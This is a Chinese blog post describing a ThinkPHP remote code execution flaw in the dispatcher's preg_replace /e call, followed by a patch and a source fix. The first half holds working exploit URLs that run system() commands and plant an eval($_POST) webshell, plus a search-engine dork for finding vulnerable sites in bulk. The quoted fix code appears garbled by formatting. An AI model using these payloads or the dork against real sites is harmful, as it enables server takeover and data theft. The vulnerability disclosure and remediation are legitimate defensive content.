thinkphp框架漏洞

thinkphp框架爆出了一个任意代码执行漏洞,其危害性相当的高,漏洞利用方法如下:

?
index.php/module/aciton/param1/${@
print
(THINK_VERSION)}
 
index.php/module/aciton/param1/${@function_all()}

其中的function_all代表任何函数,比如:

?
index.php/module/aciton/param1/${@phpinfo()}

@system( ls )      // 任意命令执行

就可以获取服务器的系统配置信息等。

?
index.php/module/action/param1/{${system(
$_GET
[
'x'
])}}?x=ls -al

可以列出网站文件列表

?
index.php/module/action/param1/{${
eval
(
$_POST
[s])}}

就可以直接执行一句话代码,用菜刀直接连接.

这样黑客们就可以直接通过google批量搜索关键字:thinkphp intitle:系统发生错误 来获取更多使用thinkphp框架的网站列表。可见其危害性相当的大。

thinkphp框架执行任意代码漏洞修复方法:

用户可下载官方发布的补丁:

http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838

或者或者直接修改源码:

将/ThinkPHP/Lib/Core/Dispatcher.class.php文件中的

?
$res
= preg_replace(
'@(w+)'
.
$depr
.
'([^'
.
$depr
.
'\/]+)@e'
, 
'$var[\'\\1\']="\\2";'
, implode(
$depr
,
$paths
));

修改为:

?
$res
= preg_replace(
'@(w+)'
.
$depr
.
'([^'
.
$depr
.
'\/]+)@e'
, 
'$var[\'\\1\']="\\2'
;', implode(
$depr
,
$paths
));

将preg_replace第二个参数中的双引号改为单引号,防止其中的php变量语法被解析执行。

thinkphp, 命令执行, 框架漏洞

三款免费实用的本地文件夹同步/备份软件推荐 (SyncToy/FreeFileSync/Compare Advance) 批处理命令findstr正则表达式的基本用法

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huike008

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值